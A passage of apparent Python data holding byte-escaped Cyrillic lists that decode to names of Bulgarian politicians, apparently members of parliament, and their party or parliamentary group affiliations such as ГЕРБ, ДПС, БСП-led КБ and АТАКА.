\xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x92\xd0\x9b\xd0\x90\xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa0 \xd0\x92\xd0\xaa\xd0\x9b\xd0\xa7\xd0\x95\xd0\x92 \xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\xa3\xd0\xa8\xd0\x95\xd0\x92', '\xd0\x9b\xd0\xae\xd0\x91\xd0\x9e\xd0\x9c\xd0\x98\xd0\xa0 \xd0\x92\xd0\x9b\xd0\x90\xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x92\xd0\x9b\xd0\x90\xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x9b\xd0\xae\xd0\xa2\xd0\x92\xd0\x98 \xd0\x90\xd0\xa5\xd0\x9c\xd0\x95\xd0\x94 \xd0\x9c\xd0\x95\xd0\xa1\xd0\xa2\xd0\x90\xd0\x9d', '\xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x90\xd0\x99 \xd0\x92\xd0\x95\xd0\xa1\xd0\x95\xd0\x9b\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x90\xd0\x9b\xd0\x95\xd0\x9a\xd0\xa1\xd0\x90\xd0\x9d\xd0\x94\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\xa0\xd0\x90\xd0\x9c\xd0\x90\xd0\x94\xd0\x90\xd0\x9d \xd0\x91\xd0\x90\xd0\x99\xd0\xa0\xd0\x90\xd0\x9c \xd0\x90\xd0\xa2\xd0\x90\xd0\x9b\xd0\x90\xd0\x99', '\xd0\xa1\xd0\x95\xd0\xa0\xd0\x93\xd0\x95\xd0\x99 \xd0\x94\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x98\xd0\x95\xd0\x92\xd0\x98\xd0\xa7 \xd0\xa1\xd0\xa2\xd0\x90\xd0\x9d\xd0\x98\xd0\xa8\xd0\x95\xd0\x92', '\xd0\xa1\xd0\xa2\xd0\x95\xd0\xa4\xd0\x90\xd0\x9d \xd0\x9b\xd0\x90\xd0\x9c\xd0\x91\xd0\x9e\xd0\x92 \xd0\x94\xd0\x90\xd0\x9d\xd0\x90\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92', '\xd0\xa6\xd0\x92\xd0\x95\xd0\xa2\xd0\x90\xd0\x9d \xd0\x93\xd0\x95\xd0\x9d\xd0\xa7\xd0\x95\xd0\x92 \xd0\xa6\xd0\x92\xd0\x95\xd0\xa2\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\xa8\xd0\x95\xd0\x9d\xd0\x94\xd0\x9e\xd0\x90\xd0\x9d \xd0\xa0\xd0\x95\xd0\x9c\xd0\x97\xd0\x98 \xd0\xa5\xd0\x90\xd0\x9b\xd0\x98\xd0\xa2', '\xd0\xaf\xd0\x92\xd0\x9e\xd0\xa0 \xd0\x91\xd0\x9e\xd0\x96\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92 \xd0\x9d\xd0\x9e\xd0\xa2\xd0\x95\xd0\x92', '\xd0\xaf\xd0\x9d\xd0\x90\xd0\x9a\xd0\x98 \xd0\x91\xd0\x9e\xd0\xaf\xd0\x9d\xd0\x9e\xd0\x92 \xd0\xa1\xd0\xa2\xd0\x9e\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92', '\xd0\xa0\xd0\x90\xd0\x94\xd0\x98 
\xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92 \xd0\xa1\xd0\xa2\xd0\x9e\xd0\xaf\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x92\xd0\x9b\xd0\x90\xd0\x94\xd0\x98\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92 \xd0\xa2\xd0\x9e\xd0\xa8\xd0\x9a\xd0\x9e\xd0\x92 \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92', '\xd0\x9a\xd0\xa0\xd0\x98\xd0\xa1\xd0\xa2\xd0\x98\xd0\xaf\xd0\x9d \xd0\xa0\xd0\x9e\xd0\x91\xd0\x95\xd0\xa0\xd0\xa2 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x90\xd0\x9d\xd0\x94\xd0\x9e\xd0\x9d \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x90\xd0\x9d\xd0\x94\xd0\x9e\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x98\xd0\x92\xd0\x90\xd0\x9d \xd0\xa2\xd0\x9e\xd0\x94\xd0\x9e\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x9c\xd0\x95\xd0\xa5\xd0\x9c\xd0\x95\xd0\x94 \xd0\xae\xd0\x9c\xd0\x95\xd0\xa0 \xd0\x90\xd0\xa2\xd0\x90\xd0\x9c\xd0\x90\xd0\x9d', '\xd0\x9a\xd0\x90\xd0\x9b\xd0\x98\xd0\x9d\xd0\x90 \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90 \xd0\x91\xd0\x90\xd0\x9b\xd0\x90\xd0\x91\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9d\xd0\x98\xd0\x93\xd0\xaf\xd0\xa0 \xd0\xa1\xd0\x90\xd0\xa5\xd0\x9b\xd0\x98\xd0\x9c \xd0\x94\xd0\x96\xd0\x90\xd0\xa4\xd0\x95\xd0\xa0', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9d\xd0\x90\xd0\xa1 \xd0\xa1\xd0\xa2\xd0\x9e\xd0\x99\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9f\xd0\xaa\xd0\x94\xd0\x95\xd0\x92', '\xd0\x97\xd0\x90\xd0\xa5\xd0\x90\xd0\xa0\xd0\x98 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92', '\xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98 \xd0\xa6\xd0\x92\xd0\x95\xd0\xa2\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9c\xd0\x90\xd0\xa0\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x9f\xd0\x95\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x95\xd0\x9a\xd0\x90\xd0\xa2\xd0\x95\xd0\xa0\xd0\x98\xd0\x9d\xd0\x90 
\xd0\x92\xd0\x90\xd0\xa1\xd0\x98\xd0\x9b\xd0\x95\xd0\x92\xd0\x90 \xd0\x97\xd0\x90\xd0\xaf\xd0\x9a\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9c\xd0\x98\xd0\x93\xd0\x9b\xd0\x95\xd0\x9d\xd0\x90 \xd0\x94\xd0\x9e\xd0\x99\xd0\x9a\xd0\x9e\xd0\x92\xd0\x90 \xd0\x90\xd0\x9b\xd0\x95\xd0\x9a\xd0\xa1\xd0\x90\xd0\x9d\xd0\x94\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9b\xd0\x90\xd0\x97\xd0\x90\xd0\xa0 \xd0\x9e\xd0\x93\xd0\x9d\xd0\xaf\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9f\xd0\x9e\xd0\x9f\xd0\x9e\xd0\x92', '\xd0\x9c\xd0\x90\xd0\xa0\xd0\x93\xd0\x90\xd0\xa0\xd0\x98\xd0\xa2\xd0\x90 \xd0\x90\xd0\xa1\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90 \xd0\xa1\xd0\xa2\xd0\x9e\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x96\xd0\x90\xd0\xa0\xd0\x90 \xd0\x92\xd0\x95\xd0\xa1\xd0\x95\xd0\x9b\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9f\xd0\x95\xd0\x9d\xd0\x95\xd0\x92\xd0\x90-\xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92\xd0\x90', '\xd0\x95\xd0\x92\xd0\x94\xd0\x9e\xd0\x9a\xd0\x98\xd0\xaf \xd0\xa1\xd0\x9b\xd0\x90\xd0\x92\xd0\xa7\xd0\x9e\xd0\x92\xd0\x90 \xd0\x90\xd0\xa1\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9c\xd0\x95\xd0\xa2\xd0\x9e\xd0\x94\xd0\x98 \xd0\xa2\xd0\x95\xd0\x9e\xd0\xa5\xd0\x90\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x9a\xd0\x9e\xd0\xa1\xd0\xa2\xd0\x90\xd0\x94\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\xa1\xd0\x95\xd0\xa0\xd0\x93\xd0\x95\xd0\x99 \xd0\x9c\xd0\x90\xd0\x9d\xd0\xa3\xd0\xa8\xd0\x9e\xd0\x92 \xd0\x9a\xd0\x98\xd0\xa7\xd0\x98\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\xa5\xd0\x90\xd0\x9c\xd0\x98 \xd0\x98\xd0\x91\xd0\xa0\xd0\x90\xd0\xa5\xd0\x98\xd0\x9c\xd0\x9e\xd0\x92 \xd0\xa5\xd0\x90\xd0\x9c\xd0\x98\xd0\x95\xd0\x92', '\xd0\x9a\xd0\x90\xd0\x9b\xd0\x98\xd0\x9d \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9c\xd0\x98\xd0\x9b\xd0\xa7\xd0\x95\xd0\x92', '\xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98 \xd0\xa5\xd0\xa0\xd0\x98\xd0\xa1\xd0\xa2\xd0\x9e\xd0\x92 \xd0\x91\xd0\x9e\xd0\xa0\xd0\x98\xd0\xa1\xd0\x9e\xd0\x92', '\xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98 
\xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x90\xd0\x9d\xd0\x94\xd0\xa0\xd0\x95\xd0\x95\xd0\x92', '\xd0\xa2\xd0\x90\xd0\xa1\xd0\x9a\xd0\x9e \xd0\x9c\xd0\x98\xd0\xa5\xd0\x90\xd0\x99\xd0\x9b\xd0\x9e\xd0\x92 \xd0\x95\xd0\xa0\xd0\x9c\xd0\x95\xd0\x9d\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x9f\xd0\x95\xd0\x9d\xd0\x9a\xd0\x9e \xd0\x90\xd0\xa2\xd0\x90\xd0\x9d\xd0\x90\xd0\xa1\xd0\x9e\xd0\x92 \xd0\x90\xd0\xa2\xd0\x90\xd0\x9d\xd0\x90\xd0\xa1\xd0\x9e\xd0\x92', '\xd0\x9f\xd0\x9b\xd0\x90\xd0\x9c\xd0\x95\xd0\x9d \xd0\xa5\xd0\xa0\xd0\x98\xd0\xa1\xd0\xa2\xd0\x9e\xd0\x92 \xd0\x96\xd0\x95\xd0\x9b\xd0\xaf\xd0\x97\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x90\xd0\x9b\xd0\x95\xd0\x9a\xd0\xa1\xd0\x90\xd0\x9d\xd0\x94\xd0\xaa\xd0\xa0 \xd0\xa5\xd0\xa0\xd0\x98\xd0\xa1\xd0\xa2\xd0\x9e\xd0\x92 \xd0\x9c\xd0\x95\xd0\xa2\xd0\x9e\xd0\x94\xd0\x98\xd0\x95\xd0\x92', '\xd0\x90\xd0\x9b\xd0\x95\xd0\x9a\xd0\xa1\xd0\x98 \xd0\x92\xd0\x90\xd0\xa1\xd0\x98\xd0\x9b\xd0\x95\xd0\x92 \xd0\x90\xd0\x9b\xd0\x95\xd0\x9a\xd0\xa1\xd0\x98\xd0\x95\xd0\x92', '\xd0\x9f\xd0\x95\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x98\xd0\x9b\xd0\x98\xd0\x95\xd0\x92 \xd0\xaf\xd0\x9a\xd0\x98\xd0\x9c\xd0\x9e\xd0\x92', '\xd0\x9d\xd0\x95\xd0\x9b\xd0\x98 \xd0\xa0\xd0\xa3\xd0\xa1\xd0\x9a\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90']
force = ['\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\xa0\xd0\x97\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\x9a\xd0\x91', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\xa1\xd0\x9a', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\xa0\xd0\x97\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\xa0\xd0\x97\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\xa1\xd0\x9a', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\x9a\xd0\x91', '\xd0\xa0\xd0\x97\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\xa1\xd0\x9a', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', 
'\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\xa1\xd0\x9a', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\xa0\xd0\x97\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\xa0\xd0\x97\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\xa1\xd0\x9a', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\xa0\xd0\x97\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\xa0\xd0\x97\xd0\xa1', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\xa1\xd0\x9a', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\xa1\xd0\x9a', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', 
'\xd0\xa1\xd0\x9a', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\x9a\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\xa1\xd0\x9a', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\xa0\xd0\x97\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\xa1\xd0\x9a', '\xd0\xa1\xd0\x9a', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\xa1\xd0\x9a', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\xa1\xd0\x9a', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', 
'\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\xa1\xd0\x9a', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x9a\xd0\x91', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\xa1\xd0\x9a', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\x9a\xd0\x91', '\xd0\xa0\xd0\x97\xd0\xa1', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\xa1\xd0\x9a', '\xd0\x9a\xd0\x91', '\xd0\xa0\xd0\x97\xd0\xa1', 
'\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\xa0\xd0\x97\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 